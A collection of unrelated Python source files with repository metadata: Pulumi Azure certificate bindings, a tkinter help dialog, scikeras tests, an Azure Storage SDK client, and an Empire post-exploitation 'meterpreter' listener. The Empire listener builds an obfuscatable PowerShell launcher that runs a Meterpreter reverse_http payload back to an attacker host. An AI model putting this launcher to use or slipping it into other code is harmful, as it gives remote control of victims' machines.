pulumi.set(__self__, "exportable", exportable)
if name is not None:
pulumi.set(__self__, "name", name)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if thumbprint is not None:
pulumi.set(__self__, "thumbprint", thumbprint)
@property
@pulumi.getter(name="automationAccountName")
def automation_account_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the automation account in which the Certificate is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "automation_account_name")
@automation_account_name.setter
def automation_account_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "automation_account_name", value)
@property
@pulumi.getter
def base64(self) -> Optional[pulumi.Input[str]]:
"""
Base64 encoded value of the certificate.
"""
return pulumi.get(self, "base64")
@base64.setter
def base64(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "base64", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of this Automation Certificate.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def exportable(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "exportable")
@exportable.setter
def exportable(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "exportable", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Certificate. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the resource group in which the Certificate is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def thumbprint(self) -> Optional[pulumi.Input[str]]:
"""
The thumbprint for the certificate.
"""
return pulumi.get(self, "thumbprint")
@thumbprint.setter
def thumbprint(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "thumbprint", value)
class Certificate(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
automation_account_name: Optional[pulumi.Input[str]] = None,
base64: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages an Automation Certificate.
## Import
Automation Certificates can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:automation/certificate:Certificate certificate1 /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Automation/automationAccounts/account1/certificates/certificate1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] automation_account_name: The name of the automation account in which the Certificate is created. Changing this forces a new resource to be created.
:param pulumi.Input[str] base64: Base64 encoded value of the certificate.
:param pulumi.Input[str] description: The description of this Automation Certificate.
:param pulumi.Input[str] name: Specifies the name of the Certificate. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the Certificate is created. Changing this forces a new resource to be created.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: CertificateArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages an Automation Certificate.
## Import
Automation Certificates can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:automation/certificate:Certificate certificate1 /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Automation/automationAccounts/account1/certificates/certificate1
```
:param str resource_name: The name of the resource.
:param CertificateArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(CertificateArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
automation_account_name: Optional[pulumi.Input[str]] = None,
base64: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = CertificateArgs.__new__(CertificateArgs)
if automation_account_name is None and not opts.urn:
raise TypeError("Missing required property 'automation_account_name'")
__props__.__dict__["automation_account_name"] = automation_account_name
if base64 is None and not opts.urn:
raise TypeError("Missing required property 'base64'")
__props__.__dict__["base64"] = base64
__props__.__dict__["description"] = description
__props__.__dict__["name"] = name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["exportable"] = None
__props__.__dict__["thumbprint"] = None
super(Certificate, __self__).__init__(
'azure:automation/certificate:Certificate',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
automation_account_name: Optional[pulumi.Input[str]] = None,
base64: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
exportable: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
thumbprint: Optional[pulumi.Input[str]] = None) -> 'Certificate':
"""
Get an existing Certificate resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] automation_account_name: The name of the automation account in which the Certificate is created. Changing this forces a new resource to be created.
:param pulumi.Input[str] base64: Base64 encoded value of the certificate.
:param pulumi.Input[str] description: The description of this Automation Certificate.
:param pulumi.Input[str] name: Specifies the name of the Certificate. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the Certificate is created. Changing this forces a new resource to be created.
:param pulumi.Input[str] thumbprint: The thumbprint for the certificate.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _CertificateState.__new__(_CertificateState)
__props__.__dict__["automation_account_name"] = automation_account_name
__props__.__dict__["base64"] = base64
__props__.__dict__["description"] = description
__props__.__dict__["exportable"] = exportable
__props__.__dict__["name"] = name
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["thumbprint"] = thumbprint
return Certificate(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="automationAccountName")
def automation_account_name(self) -> pulumi.Output[str]:
"""
The name of the automation account in which the Certificate is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "automation_account_name")
@property
@pulumi.getter
def base64(self) -> pulumi.Output[str]:
"""
Base64 encoded value of the certificate.
"""
return pulumi.get(self, "base64")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
The description of this Automation Certificate.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def exportable(self) -> pulumi.Output[bool]:
return pulumi.get(self, "exportable")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Specifies the name of the Certificate. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the resource group in which the Certificate is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter
def thumbprint(self) -> pulumi.Output[str]:
"""
The thumbprint for the certificate.
"""
return pulumi.get(self, "thumbprint")
| 43.960298 | 237 | 0.66042 |
c41f9410283dfbbaf2f0f8fcdf2fbcc735347b24 | 5,484 | py | Python | lib/listeners/meterpreter.py | Gui-Luz/Empire | 6f5eeff5f46dd085e1317cb09b39853a2fce5d13 | [
"BSD-3-Clause"
] | 5,720 | 2017-02-02T13:59:40.000Z | 2022-03-31T09:50:10.000Z | lib/listeners/meterpreter.py | VookiBoo/Empire | 5aae31e7de591282773d2c8498af04ee4e8778f5 | [
"BSD-3-Clause"
] | 866 | 2017-02-02T10:56:31.000Z | 2020-01-17T07:47:05.000Z | lib/listeners/meterpreter.py | VookiBoo/Empire | 5aae31e7de591282773d2c8498af04ee4e8778f5 | [
"BSD-3-Clause"
] | 2,181 | 2017-02-04T10:28:41.000Z | 2022-03-31T04:36:56.000Z | # Empire imports
from lib.common import helpers
class Listener:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Meterpreter',
'Author': ['@harmj0y'],
'Description': ("Starts a 'foreign' http[s] Meterpreter listener."),
'Category' : ('client_server'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name' : {
'Description' : 'Name for the listener.',
'Required' : True,
'Value' : 'meterpreter'
},
'Host' : {
'Description' : 'Hostname/IP for staging.',
'Required' : True,
'Value' : "http://%s:%s" % (helpers.lhost(), 80)
},
'Port' : {
'Description' : 'Port for the listener.',
'Required' : True,
'Value' : 80
}
}
# required:
self.mainMenu = mainMenu
self.threads = {}
def default_response(self):
"""
Nothing needed to return here, as we're not actually starting the listener.
"""
return ''
def validate_options(self):
"""
Validate all options for this listener.
"""
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print helpers.color("[!] Option \"%s\" is required." % (key))
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None):
"""
Generate a basic launcher for the specified listener.
"""
if not language or language.lower() != 'powershell':
print helpers.color('[!] listeners/http generate_launcher(): only PowerShell is supported at this time')
return None
if listenerName and (listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
host = listenerOptions['Host']['Value']
moduleSourcePath = "%s/data/module_source/code_execution/Invoke-Shellcode.ps1" % (self.mainMenu.installPath)
try:
f = open(moduleSourcePath, 'r')
except:
print helpers.color("[!] Could not read module source path at: %s" % (moduleSourcePath))
return ''
script = f.read()
f.close()
msfPayload = 'windows/meterpreter/reverse_http'
if 'https' in host:
msfPayload += 's'
if 'http' in host:
parts = host.split(':')
host = parts[1].strip('/')
port = parts[2].strip('/')
script = helpers.strip_powershell_comments(script)
script += "\nInvoke-Shellcode -Payload %s -Lhost %s -Lport %s -Force" % (msfPayload, host, port)
if obfuscate:
script = helpers.obfuscate(self.mainMenu.installPath, script, obfuscationCommand=obfuscationCommand)
return script
else:
print helpers.color("[!] listeners/meterpreter generate_launcher(): invalid listener name specification!")
def generate_stager(self, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="", language=None):
"""
Nothing to actually generate here for foreign listeners.
"""
print "generate_stager() not applicable for listeners/meterpreter"
pass
def generate_agent(self, language=None, obfuscate=False, obfuscationCommand=""):
"""
Nothing to actually generate here for foreign listeners.
"""
print "generate_stager() not applicable for listeners/meterpreter"
pass
def generate_comms(self, language=None):
"""
Generate just the agent communication code block needed for communications with this listener.
This is so agents can easily be dynamically updated for the new listener.
TODO: same generate_comms() as listeners/meterpreter, just different server config...
"""
if language:
if language.lower() == 'powershell':
# generate Get-Task / Send-Message
pass
elif language.lower() == 'python':
# send_message()
pass
else:
print helpers.color("[!] listeners/meterpreter generate_comms(): invalid language specification, only 'powershell' and 'python' are current supported for this module.")
else:
print helpers.color('[!] listeners/meterpreter generate_comms(): no language specified!')
def start(self, name=''):
"""
Nothing to actually start for a foreign listner.
"""
return True
def shutdown(self, name=''):
"""
Nothing to actually shut down for a foreign listner.
"""
pass
| 33.851852 | 213 | 0.555981 |
08c4207fe226851d2e25416a2676a2e5750f278b | 2,010 | py | Python | pymandel/howto_dialog.py | semuconsulting/PyMandel | 5827a1f598060482d59d46f53cc5bee6ad1a6d9c | [
"BSD-3-Clause"
] | 5 | 2021-03-05T07:37:53.000Z | 2022-03-10T22:42:39.000Z | pymandel/howto_dialog.py | semuconsulting/PyMandel | 5827a1f598060482d59d46f53cc5bee6ad1a6d9c | [
"BSD-3-Clause"
] | 1 | 2021-05-21T04:29:45.000Z | 2021-05-21T13:44:12.000Z | pymandel/howto_dialog.py | semuconsulting/PyMandel | 5827a1f598060482d59d46f53cc5bee6ad1a6d9c | [
"BSD-3-Clause"
] | 2 | 2021-04-23T11:13:09.000Z | 2021-08-15T07:22:17.000Z | """
How To Dialog Box class for tkinter application.
Created on 19 Apr 2020
@author: semuadmin
"""
from tkinter import Toplevel, Label, Button, LEFT
from webbrowser import open_new_tab
from pymandel.strings import HELPTXT, COPYRIGHTTXT, DLGHOWTO, GITHUBURL
class HowtoDialog:
    """
    "How To" dialog box for the PyMandel tkinter application.

    Builds a Toplevel window anchored near the root window, containing the
    help text, a clickable copyright/GitHub link and an OK button.
    """

    def __init__(self, app):
        """
        Initialise Toplevel dialog.

        :param app: reference to the main application object; must expose
            ``get_master()`` returning the root ``Tk`` instance.
        """

        self.__app = app  # Reference to main application class
        self.__master = self.__app.get_master()  # Reference to root class (Tk)

        self._dialog = Toplevel()
        # BUGFIX: ``title`` is a method of Toplevel.  The original code did
        # ``self._dialog.title = DLGHOWTO``, which overwrote the method on the
        # instance instead of setting the window title.  Call it instead.
        self._dialog.title(DLGHOWTO)
        # Offset the dialog 50px from the root window's top-left corner.
        self._dialog.geometry(
            "+%d+%d"
            % (self.__master.winfo_rootx() + 50, self.__master.winfo_rooty() + 50)
        )
        self._dialog.attributes("-topmost", "true")
        self.body()

    def body(self):
        """
        Set up widgets and lay them out in a single-column grid.
        """

        # Create widgets
        self.lbl_title = Label(self._dialog, text=DLGHOWTO)
        self.lbl_title.config(font=("Verdana", 16))
        self.lbl_desc = Label(self._dialog, justify=LEFT, text=HELPTXT, wraplength=500)
        # Styled as a hyperlink; clicking opens the project GitHub page.
        self.lbl_copyright = Label(
            self._dialog, text=COPYRIGHTTXT, fg="blue", cursor="hand2"
        )
        self.btn_ok = Button(self._dialog, text="OK", width=8, command=self.ok_press)

        # Arrange widgets
        self.lbl_title.grid(column=0, row=0, padx=5, pady=5)
        self.lbl_desc.grid(column=0, row=2, padx=5, pady=5)
        self.lbl_copyright.grid(column=0, row=3, padx=5, pady=5)
        self.btn_ok.grid(column=0, row=5, ipadx=3, ipady=3, padx=5, pady=5)

        # Bind commands and hotkeys
        self.lbl_copyright.bind("<Button-1>", lambda e: open_new_tab(GITHUBURL))
        self.btn_ok.bind("<Return>", self.ok_press)
        self.btn_ok.focus_set()

    def ok_press(self, *args, **kwargs):
        """
        Handle OK button press (or <Return> on the button): close the dialog.
        """

        self.__master.update_idletasks()
        self._dialog.destroy()
8fc919f16bd8a2537f14121e5a3782149aa15e6b | 2,126 | py | Python | tests/test_utils.py | metasyn/scikeras | cb422fdd4f5c592feb71ce155fa25f26b25cdd82 | [
"MIT"
] | 111 | 2020-06-16T16:14:09.000Z | 2022-03-28T14:28:28.000Z | tests/test_utils.py | metasyn/scikeras | cb422fdd4f5c592feb71ce155fa25f26b25cdd82 | [
"MIT"
] | 240 | 2020-07-13T15:51:34.000Z | 2022-03-29T07:46:09.000Z | tests/test_utils.py | metasyn/scikeras | cb422fdd4f5c592feb71ce155fa25f26b25cdd82 | [
"MIT"
] | 16 | 2020-07-13T14:41:17.000Z | 2022-03-19T11:50:02.000Z | import numpy as np
import pytest
from tensorflow.keras import losses as losses_module
from tensorflow.keras import metrics as metrics_module
from scikeras.utils import loss_name, metric_name
class CustomLoss(losses_module.Loss):
    """Bare ``keras.losses.Loss`` subclass used to exercise ``loss_name`` on custom classes."""
    pass
class CustomMetric(metrics_module.AUC):
    """``keras.metrics.AUC`` subclass used to exercise ``metric_name`` on custom classes."""
    pass
@pytest.mark.parametrize(
    "obj",
    [
        "categorical_crossentropy",
        "CategoricalCrossentropy",
        losses_module.categorical_crossentropy,
        losses_module.CategoricalCrossentropy,
        losses_module.CategoricalCrossentropy(),
    ],
)
def test_loss_invariance(obj):
    """Test to make sure loss_name returns the same string no matter which
    representation of the loss is passed (str, function, class, or instance)."""
    assert loss_name(obj) == "categorical_crossentropy"
@pytest.mark.parametrize("obj", [CustomLoss, CustomLoss()])
def test_custom_loss(obj):
    """loss_name should return the snake_cased class name for custom losses."""
    assert loss_name(obj) == "custom_loss"
@pytest.mark.parametrize(
    "obj",
    [
        "categorical_crossentropy",
        "CategoricalCrossentropy",
        metrics_module.categorical_crossentropy,
        metrics_module.CategoricalCrossentropy,
        metrics_module.CategoricalCrossentropy(),
    ],
)
def test_metric_invariance(obj):
    """Test to make sure the same metric name is returned no matter which
    representation of the metric is passed (str, function, class, or instance)."""
    assert metric_name(obj) == "categorical_crossentropy"
@pytest.mark.parametrize("loss", [object(), object, list()])
def test_loss_types(loss):
    """Unsupported input types should raise a TypeError from loss_name."""
    with pytest.raises(TypeError, match="``loss`` must be a"):
        loss_name(loss)
def test_unknown_loss_raises():
    """An unrecognized loss string should raise a ValueError."""
    with pytest.raises(ValueError, match="Unknown loss function"):
        loss_name("unknown_loss")
@pytest.mark.parametrize("obj", [object(), object, list()])
def test_metric_types(obj):
    """Unsupported input types should raise a TypeError from metric_name."""
    with pytest.raises(TypeError, match="``metric`` must be a"):
        metric_name(obj)
def test_unknown_metric():
    """An unrecognized metric string should raise a ValueError."""
    with pytest.raises(ValueError, match="Unknown metric function"):
        metric_name("unknown_metric")
@pytest.mark.parametrize("metric", [CustomMetric, CustomMetric()])
def test_custom_metric(metric):
    """metric_name should return the snake_cased class name for custom metrics."""
    assert metric_name(metric) == "custom_metric"
| 26.911392 | 78 | 0.718721 |
ee89243e8d1e3a7bb4b043e5b247159988ddb6ad | 12,865 | py | Python | sdk/storage/azure-mgmt-storage/azure/mgmt/storage/v2020_08_01_preview/aio/operations/_management_policies_operations.py | ankitarorabit/azure-sdk-for-python | dd90281cbad9400f8080754a5ef2f56791a5a88f | [
"MIT"
] | 3 | 2020-06-23T02:25:27.000Z | 2021-09-07T18:48:11.000Z | sdk/storage/azure-mgmt-storage/azure/mgmt/storage/v2020_08_01_preview/aio/operations/_management_policies_operations.py | ankitarorabit/azure-sdk-for-python | dd90281cbad9400f8080754a5ef2f56791a5a88f | [
"MIT"
] | 510 | 2019-07-17T16:11:19.000Z | 2021-08-02T08:38:32.000Z | sdk/storage/azure-mgmt-storage/azure/mgmt/storage/v2020_08_01_preview/aio/operations/_management_policies_operations.py | ankitarorabit/azure-sdk-for-python | dd90281cbad9400f8080754a5ef2f56791a5a88f | [
"MIT"
] | 5 | 2019-09-04T12:51:37.000Z | 2020-09-16T07:28:40.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
# NOTE: this class is generated by AutoRest (see the file header); hand edits
# will be lost if the client is regenerated, so changes are documentation-only.
class ManagementPoliciesOperations:
    """ManagementPoliciesOperations async operations.

    You should not instantiate this class directly. Instead, you should create a Client instance that
    instantiates it for you and attaches it as an attribute.

    :ivar models: Alias to model classes used in this operation group.
    :type models: ~azure.mgmt.storage.v2020_08_01_preview.models
    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    """

    models = _models

    def __init__(self, client, config, serializer, deserializer) -> None:
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self._config = config

    async def get(
        self,
        resource_group_name: str,
        account_name: str,
        management_policy_name: Union[str, "_models.ManagementPolicyName"],
        **kwargs
    ) -> "_models.ManagementPolicy":
        """Gets the managementpolicy associated with the specified storage account.

        :param resource_group_name: The name of the resource group within the user's subscription. The
         name is case insensitive.
        :type resource_group_name: str
        :param account_name: The name of the storage account within the specified resource group.
         Storage account names must be between 3 and 24 characters in length and use numbers and
         lower-case letters only.
        :type account_name: str
        :param management_policy_name: The name of the Storage Account Management Policy. It should
         always be 'default'.
        :type management_policy_name: str or ~azure.mgmt.storage.v2020_08_01_preview.models.ManagementPolicyName
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: ManagementPolicy, or the result of cls(response)
        :rtype: ~azure.mgmt.storage.v2020_08_01_preview.models.ManagementPolicy
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.ManagementPolicy"]
        # Map auth/404/409 statuses to specific exception types; callers may extend via 'error_map'.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2020-08-01-preview"
        accept = "application/json"

        # Construct URL
        url = self.get.metadata['url']  # type: ignore
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
            'accountName': self._serialize.url("account_name", account_name, 'str', max_length=24, min_length=3),
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
            'managementPolicyName': self._serialize.url("management_policy_name", management_policy_name, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        request = self._client.get(url, query_parameters, header_parameters)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        deserialized = self._deserialize('ManagementPolicy', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized
    get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}/managementPolicies/{managementPolicyName}'}  # type: ignore

    async def create_or_update(
        self,
        resource_group_name: str,
        account_name: str,
        management_policy_name: Union[str, "_models.ManagementPolicyName"],
        properties: "_models.ManagementPolicy",
        **kwargs
    ) -> "_models.ManagementPolicy":
        """Sets the managementpolicy to the specified storage account.

        :param resource_group_name: The name of the resource group within the user's subscription. The
         name is case insensitive.
        :type resource_group_name: str
        :param account_name: The name of the storage account within the specified resource group.
         Storage account names must be between 3 and 24 characters in length and use numbers and
         lower-case letters only.
        :type account_name: str
        :param management_policy_name: The name of the Storage Account Management Policy. It should
         always be 'default'.
        :type management_policy_name: str or ~azure.mgmt.storage.v2020_08_01_preview.models.ManagementPolicyName
        :param properties: The ManagementPolicy set to a storage account.
        :type properties: ~azure.mgmt.storage.v2020_08_01_preview.models.ManagementPolicy
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: ManagementPolicy, or the result of cls(response)
        :rtype: ~azure.mgmt.storage.v2020_08_01_preview.models.ManagementPolicy
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.ManagementPolicy"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2020-08-01-preview"
        content_type = kwargs.pop("content_type", "application/json")
        accept = "application/json"

        # Construct URL
        url = self.create_or_update.metadata['url']  # type: ignore
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
            'accountName': self._serialize.url("account_name", account_name, 'str', max_length=24, min_length=3),
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
            'managementPolicyName': self._serialize.url("management_policy_name", management_policy_name, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        # Serialize the ManagementPolicy model as the PUT request body.
        body_content_kwargs = {}  # type: Dict[str, Any]
        body_content = self._serialize.body(properties, 'ManagementPolicy')
        body_content_kwargs['content'] = body_content
        request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        deserialized = self._deserialize('ManagementPolicy', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized
    create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}/managementPolicies/{managementPolicyName}'}  # type: ignore

    async def delete(
        self,
        resource_group_name: str,
        account_name: str,
        management_policy_name: Union[str, "_models.ManagementPolicyName"],
        **kwargs
    ) -> None:
        """Deletes the managementpolicy associated with the specified storage account.

        :param resource_group_name: The name of the resource group within the user's subscription. The
         name is case insensitive.
        :type resource_group_name: str
        :param account_name: The name of the storage account within the specified resource group.
         Storage account names must be between 3 and 24 characters in length and use numbers and
         lower-case letters only.
        :type account_name: str
        :param management_policy_name: The name of the Storage Account Management Policy. It should
         always be 'default'.
        :type management_policy_name: str or ~azure.mgmt.storage.v2020_08_01_preview.models.ManagementPolicyName
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: None, or the result of cls(response)
        :rtype: None
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType[None]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2020-08-01-preview"

        # Construct URL
        url = self.delete.metadata['url']  # type: ignore
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
            'accountName': self._serialize.url("account_name", account_name, 'str', max_length=24, min_length=3),
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
            'managementPolicyName': self._serialize.url("management_policy_name", management_policy_name, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]

        request = self._client.delete(url, query_parameters, header_parameters)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        # Both 200 and 204 (no content) are treated as successful deletion.
        if response.status_code not in [200, 204]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        if cls:
            return cls(pipeline_response, None, {})

    delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}/managementPolicies/{managementPolicyName}'}  # type: ignore
| 52.942387 | 225 | 0.691799 |
412b244d2e26056543472e9371dbc89632e32a4b | 87,357 | py | Python | build/lib/pymint/main/interpret_toolkit.py | monte-flora/py-mint | 0dd22a2e3dce68d1a12a6a99623cb4d4cb407b58 | [
"MIT"
] | 9 | 2021-04-12T16:11:38.000Z | 2022-03-18T09:03:58.000Z | build/lib/pymint/main/interpret_toolkit.py | monte-flora/py-mint | 0dd22a2e3dce68d1a12a6a99623cb4d4cb407b58 | [
"MIT"
] | 21 | 2021-04-13T01:17:40.000Z | 2022-03-11T16:06:50.000Z | build/lib/pymint/main/interpret_toolkit.py | monte-flora/mintpy | 23f9a952726dc0e69dfcdda2f8c7c27858aa9a11 | [
"MIT"
] | 1 | 2021-11-15T20:56:46.000Z | 2021-11-15T20:56:46.000Z | import numpy as np
import xarray as xr
import pandas as pd
import itertools
# Computation imports
from ..common.attributes import Attributes
from .local_interpret import LocalInterpret
from .global_interpret import GlobalInterpret
# Plotting imports
from ..plot.plot_interpret_curves import PlotInterpretCurves
from ..plot.plot_permutation_importance import PlotImportance
from ..plot.plot_feature_contributions import PlotFeatureContributions
from ..plot.plot_2D import PlotInterpret2D
from ..plot._box_and_whisker import box_and_whisker
from ..plot._kde_2d import PlotScatter
from ..common.utils import (
to_xarray,
get_indices_based_on_performance,
retrieve_important_vars,
load_netcdf,
load_dataframe,
save_netcdf,
